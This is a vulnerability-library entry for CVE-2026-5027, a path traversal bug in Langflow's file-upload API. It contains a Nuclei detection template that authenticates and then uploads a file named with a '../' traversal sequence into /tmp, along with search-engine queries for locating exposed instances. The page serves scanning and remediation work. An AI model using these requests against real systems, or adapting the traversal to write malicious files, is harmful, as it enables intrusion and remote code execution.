/Vulnerability Library

Langflow <= 1.8.4 - Path Traversal to RCE via File Upload

CVE-2026-5027
Verified

Description

The application contains a path traversal vulnerability caused by unsanitized 'filename' parameter in the 'POST /api/v2/files' multipart form data, letting attackers write files to arbitrary filesystem locations, exploit requires crafted request.

Severity

High

CVSS Score

8.8

Exploit Probability

2%

Affected Product

langflow

Published Date

June 9, 2026

Template Author

pussycat0x

CVE-2026-5027.yaml
id: CVE-2026-5027

info:
  name: Langflow <= 1.8.4 - Path Traversal to RCE via File Upload
  author: pussycat0x
  severity: high
  description: |
    The application contains a path traversal vulnerability caused by unsanitized 'filename' parameter in the 'POST /api/v2/files' multipart form data, letting attackers write files to arbitrary filesystem locations, exploit requires crafted request.
  impact: |
    Attackers can write files to arbitrary locations, potentially leading to system compromise or data tampering.
  remediation: |
    Sanitize the 'filename' parameter to prevent path traversal or update to the latest secure version.
  reference:
    - https://github.com/langflow-ai/langflow/pull/12227
    - https://github.com/0xBlackash/CVE-2026-5027
    - https://github.com/langflow-ai/langflow/security/advisories/GHSA-g2j9-7rj2-gm6c
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2026-5027
    epss-score: 0.02104
    epss-percentile: 0.79506
    cwe-id: CWE-22
  metadata:
    max-request: 2
    vendor: langflow-ai
    product: langflow
    shodan-query: title:"Langflow"
    fofa-query: title="Langflow"
  tags: cve,cve2026,langflow,lfi,intrusive,vkev

flow: http(1) || http(2)

http:
  - raw:
      - |
        GET /api/v1/auto_login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

      - |
        POST /api/v2/files HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{access_token}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarya3f2c8d9e7b14650

        ------WebKitFormBoundarya3f2c8d9e7b14650
        Content-Disposition: form-data; name="file"; filename="../../../../../../../../../tmp/{{randstr}}.txt"
        Content-Type: text/plain

        {{randstr}}
        ------WebKitFormBoundarya3f2c8d9e7b14650--

    matchers:
      - type: dsl
        dsl:
          - "status_code_2 == 201"
          - "contains_all(body_2, 'id','name','path')"
        condition: and

    extractors:
      - type: json
        name: access_token
        part: body_1
        json:
          - ".access_token"
        internal: true

      - type: json
        part: body_2
        json:
          - ".path"

  - raw:
      - |
        POST /api/v1/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: application/json

        username={{username}}&password={{password}}

      - |
        POST /api/v2/files HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{access_token}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarya3f2c8d9e7b14650

        ------WebKitFormBoundarya3f2c8d9e7b14650
        Content-Disposition: form-data; name="file"; filename="../../../../../../../../../tmp/{{randstr}}.txt"
        Content-Type: text/plain

        {{randstr}}
        ------WebKitFormBoundarya3f2c8d9e7b14650--

    matchers:
      - type: dsl
        dsl:
          - "status_code_2 == 201"
          - "contains_all(body_2, 'id','name','path')"
        condition: and

    extractors:
      - type: json
        name: access_token
        part: body_1
        json:
          - ".access_token"
        internal: true

      - type: json
        part: body_2
        json:
          - ".path"
# digest: 4b0a00483046022100c260f8a64543fe45d57e81087a6177430662481d7197b5eebc6956ec3d1fa14c022100e8e557de9a9e4d8657404fb27d065893ce5442db5fc126759439262f3b843363:922c64590222798bb761d5b6d8e72950
8.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-5027
CWE ID:
cwe-22

References

https://github.com/langflow-ai/langflow/pull/12227https://github.com/0xBlackash/CVE-2026-5027https://github.com/langflow-ai/langflow/security/advisories/GHSA-g2j9-7rj2-gm6c

Remediation Steps

Sanitize the 'filename' parameter to prevent path traversal or update to the latest secure version.